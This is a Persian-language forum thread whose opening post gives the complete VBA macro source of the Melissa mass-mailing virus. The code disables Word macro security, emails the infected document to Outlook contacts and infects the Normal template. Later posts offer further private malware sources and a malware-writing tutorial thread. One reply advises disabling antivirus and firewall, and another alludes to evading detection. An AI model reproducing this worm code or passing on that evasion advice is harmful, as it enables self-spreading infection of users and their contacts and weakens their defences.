با سلام
اينم سورس ويروس مليسا كه به صورت ماكرو اجرا ميشه!



Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub


اگه خواستين بگين تبديلش كنم.
با تشكر

مرسی دوست عزیز تا مدیر نیومده اپش کن :31: مدیر می یاد نظر می ده صفحه سنگین میشه :46:

من سورس اين ويروس رو دارم...! كلي سورس ديگه هم دارم...!؟! (البته يه سري ش Priv8 ه...!؟! :21:)

قبلاً ها يه تاپيك زده بودم با عنوان "آموزش بد افزار نويسي...!؟!" ...!؟!

اگه پايه ايد بريم اونجا فعاليت كنيم... و تاپيك رو دوباره بالا بياريم...؟!

اگه خواستيد شروع كنيد... يه نِدا بديد... تا من تاپيك رو دوباره بيارم بالا...!؟!

ممنون...!؟!

من سورس اين ويروس رو دارم...! كلي سورس ديگه هم دارم...!؟! (البته يه سري ش Priv8 ه...!؟! :21:)

قبلاً ها يه تاپيك زده بودم با عنوان "آموزش بد افزار نويسي...!؟!" ...!؟!

اگه پايه ايد بريم اونجا فعاليت كنيم... و تاپيك رو دوباره بالا بياريم...؟!

اگه خواستيد شروع كنيد... يه نِدا بديد... تا من تاپيك رو دوباره بيارم بالا...!؟!

ممنون...!؟!

با سلام
آقا شما اصلا همه فن حريف!:20::20::20:
شما سرور مايي!:10::10::10:
شما درست ميگي!:40::40::40:
خوبه؟؟؟!!!!:19::19::19:
ديگه ادامه ندين.:18::18::41:
با تشكر
:11::11::11:

با سلام
آقا شما اصلا همه فن حريف!:20::20::20:
شما سرور مايي!:10::10::10:
شما درست ميگي!:40::40::40:
خوبه؟؟؟!!!!:19::19::19:
ديگه ادامه ندين.:18::18::41:
با تشكر
:11::11::11:

يعني چي...؟!؟!

اونوقت مدير مياد ميگه كه............!؟!

چه خبره دوستان؟:41:
---------------------------------------------------------
پلاس جان؛ موافق باشی با هم اون تاپیکو آپ کنیم:20:

این چه ویروسیه که همین صفحه رو باز کردم آنتی ویروسم خودشو کشت که بازش نکن :دی

اگه با آنتی ویروس شناسایی بشه که خیلی بده.

نمیشه کاریش کرد؟

ممنون از اساتید

چه خبره دوستان؟
---------------------------------------------------------
پلاس جان؛ موافق باشی با هم اون تاپیکو آپ کنیم

ممنون از اين كه مي خوايد همكاري كنيد...!؟! :11:

اگه فردا اينترنتم قطع نشد... بر مي گردم تا دوباره شروع كنيم... و تاپيك رو بالا بياريم...! :10:

داشتم به كتاب آموزش VBScript مي نوشتم... واسه ويروس نويسي... ولي نتونستم تمومش كنم...!؟! :41:

يه سري ار قسمت هاش رو كه تموم كردم رو ميذارم تو تايپك...!؟!

ممنون...! :40:


این چه ویروسیه که همین صفحه رو باز کردم آنتی ویروسم خودشو کشت که بازش نکن :دی

اگه با آنتی ویروس شناسایی بشه که خیلی بده.

نمیشه کاریش کرد؟

ممنون از اساتید

مگه آنتي ويروست چيه...؟!؟! :13:

اين ويروس Melissa شايد سنش از من هم بيشتر باشه...!؟! خيلي عتيقه ست...!؟!

داستان درازي داره...!؟! يه قستي از قوانين جرايم رايانه اي و... سر همين ويروس نوشته شد...!؟!

خسارت هاي سنگيني رو به بار آورد...!؟!

بيوگرافي ش رو تو يه كتاب خونده بودم...!؟! :31:

موفق باشيد...! :46:

این چه ویروسیه که همین صفحه رو باز کردم آنتی ویروسم خودشو کشت که بازش نکن :دی

اگه با آنتی ویروس شناسایی بشه که خیلی بده.

نمیشه کاریش کرد؟

ممنون از اساتید

سلام
برادر من آنتي ويروس ها به صورت هوشمند طراحي شده و از روي سورس هم ويروس ها رو شناسايي ميكنن.
بهتره آنتي ويروستون و ديوار آتشتون رو غير فعال كنيد!
با تشكر

آنتی ویروس کاسپریسکای منم صفحه رو ویروسی شناخت :31:

سلام
برادر من آنتي ويروس ها به صورت هوشمند طراحي شده و از روي سورس هم ويروس ها رو شناسايي ميكنن.
بهتره آنتي ويروستون و ديوار آتشتون رو غير فعال كنيد!
با تشكر

سلام... آنتي ويروس ها نمي تونن ويروس ها رو از رو سورسشون تشخيص بدن...!؟! شايد بتوننن سورس بعضي از ورم ها رو از روي شل كد هايي كه توش به كار رفته... بدافزار تشخيص بدن... ولي... بقيه ويروس ها رو نه...!؟! دليل اين كه آنتي ويروس به اين صفحه گير ميده اينه كه... ويروس مليسا توسط VBS نوشته شده و VBS هم يه زبان اسكريپت نويسي هستش... يعني اسكريپت ه كامپايل نمي شن... و مفسر به صورت خط به خط كد ها رو اجرا مي كنه...!؟! پس سورس ويروس = خود ويروس...!؟! به خاطر همين آنتي ويروس گير ميده...!؟! البته راه هاي زيادي هستند كه ميشه از طريقشون جلوي شنايي ويروس رو گرفت...!؟! (خودتون بهتر مي دونيد...!)

راستي... اين چيزا ربطي به فايروال نداره... فايروال تو لايه هاي پايين تري فعاليته مي كنه... اسكن هايي كه تو لايه كاربردي انجام ميشه... (روي پروتكل HTTP ...!) مربوط ميشه به همون آنتي ويروس... (بخشInternet Security) ...!؟!

ممنون...!

سلام... آنتي ويروس ها نمي تونن ويروس ها رو از رو سورسشون تشخيص بدن...!؟! شايد بتوننن سورس بعضي از ورم ها رو از روي شل كد هايي كه توش به كار رفته... بدافزار تشخيص بدن... ولي... بقيه ويروس ها رو نه...!؟! دليل اين كه آنتي ويروس به اين صفحه گير ميده اينه كه... ويروس مليسا توسط VBS نوشته شده و VBS هم يه زبان اسكريپت نويسي هستش... يعني اسكريپت ه كامپايل نمي شن... و مفسر به صورت خط به خط كد ها رو اجرا مي كنه...!؟! پس سورس ويروس = خود ويروس...!؟! به خاطر همين آنتي ويروس گير ميده...!؟! البته راه هاي زيادي هستند كه ميشه از طريقشون جلوي شنايي ويروس رو گرفت...!؟! (خودتون بهتر مي دونيد...!)

راستي... اين چيزا ربطي به فايروال نداره... فايروال تو لايه هاي پايين تري فعاليته مي كنه... اسكن هايي كه تو لايه كاربردي انجام ميشه... (روي پروتكل HTTP ...!) مربوط ميشه به همون آنتي ويروس... (بخشInternet Security) ...!؟!

ممنون...!

شرمنده، من مقاله اي رو كه پارسال ESET Smart Security منتشر كرد رو ندارم ولي خوب ميدونم همين حرف من رو زده بود.
من حتي مطلبي مبتني بر اينكه Firewall بر روي لايه هاي اينترنت(Internet) و كاربردي(Application) فعاليت ميكنند رو هم خوندم و براي همين به شما پيشنهاد ميكنم كه براي به روز رساني اطلاعات خود از مطالب و مقالات انگليسي استفاده كنيد.
در ضمن اين مباحث مربوط ميشه به انجمن شبكه و امنيت!
با تشكر